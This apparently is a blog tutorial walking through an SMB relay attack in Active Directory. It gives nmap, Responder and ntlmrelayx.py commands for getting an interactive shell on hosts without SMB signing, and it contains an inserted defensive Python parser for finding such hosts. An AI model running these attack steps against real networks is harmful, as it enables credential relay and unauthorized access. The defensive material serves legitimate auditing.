SMB Relay Attack To Gain Shell

Akshit Pal
3 min read, Jul 21, 2022

In summary: a simple SMB relay attack can get you a shell in an Active Directory (AD) environment.

[Image: SMB shell]

So what is SMB in the first place?

Short answer: the “out of paper” alert you receive on your computer when trying to print a document is the work of the SMB protocol.

The Server Message Block (SMB) protocol is a network file sharing protocol that allows applications on a computer to read and write to files and to request services from server programs in a computer network.

So, as one can guess, a man-in-the-middle (MITM) attack is possible here, granted you are on the network.

How does it work?

Well, you need three things for an SMB relay attack:

1. Network access: you must be on the network

2. Responder.py and ntlmrelayx.py

3. And last but not least, a victim with SMB signing disabled

5 simple steps to gain a shell from an SMB relay attack

Step 1: First we need to discover a target whose SMB signing is disabled. “Enabled but not required” also works fine. So let's run the old trusted nmap to discover that. Alternatively, you can run Nessus or your own script for this too.

“nmap --script=smb2-security-mode.nse -p 445 192.168.57.0/24”

[Image: nmap output showing SMB signing disabled]
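A defender auditing for this precondition wants a list of hosts to fix, not raw scan text. The following is an added example (not from the original post) that parses the normal output of the nmap script above and lists every host where signing is not required; the sample scan output, its hostnames and addresses, and the exact wording of the script's status lines are constructed assumptions.

```python
import re

# Constructed sample of `nmap --script=smb2-security-mode.nse -p 445` normal output.
# Hosts, addresses and the exact status wording are assumptions, not a real scan.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for dc01.lab.local (10.0.0.5)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for ws01.lab.local (10.0.0.21)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.0.0.33
| smb2-security-mode:
|   2.1:
|_    Message signing disabled!
"""

# "Nmap scan report for name (ip)" or "Nmap scan report for ip"
HOST_RE = re.compile(r"^Nmap scan report for (?:.*?\()?(\d+\.\d+\.\d+\.\d+)\)?\s*$")
# The script's summary line, e.g. "|_    Message signing enabled but not required"
STATUS_RE = re.compile(r"^\|_?\s+Message signing (.+?)!?\s*$")


def parse_signing_status(nmap_output):
    """Map each scanned IP to 'required', 'not_required' or 'disabled'."""
    results, current_ip = {}, None
    for line in nmap_output.splitlines():
        host = HOST_RE.match(line)
        if host:
            current_ip = host.group(1)
            continue
        status = STATUS_RE.match(line)
        if status and current_ip:
            text = status.group(1).lower()
            if "not required" in text:
                results[current_ip] = "not_required"
            elif "disabled" in text:
                results[current_ip] = "disabled"
            elif "required" in text:
                results[current_ip] = "required"
    return results


def hosts_needing_signing_enforced(nmap_output):
    """Only 'required' blocks a relayed session; everything else needs remediation."""
    return sorted(ip for ip, s in parse_signing_status(nmap_output).items() if s != "required")
```

Hosts returned by hosts_needing_signing_enforced are the ones to fix by requiring SMB signing (server and client side) through Group Policy.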

Step 2: Let’s put those in our targets.txt so that we can use them with ntlmrelayx.py. And now let's run our old Responder. Remember to turn off the HTTP and SMB servers in Responder’s config before running the command.

“responder -I eth0 -rdwv”

[Image: Responder running with SMB and HTTP servers off (TCM Academy PEH home lab)]

Step 3: Run ntlmrelayx.py against targets.txt with the -i flag to get an interactive shell.

“ntlmrelayx.py -tf targets.txt -smb2support -i”

Step 4: Wait for a victim request, which on the victim side will look like this:

And voilà, you will get the SMB shell. It will look something like this on your side:

[Image: ntlmrelayx.py SMB shell]

Step 5: Connect to the shell with netcat via the address you get. Alternatively, you can also get a Meterpreter shell with a few tweaks.

That's it. Now go around and do what you like: you can read or write files with this shell, and much more.
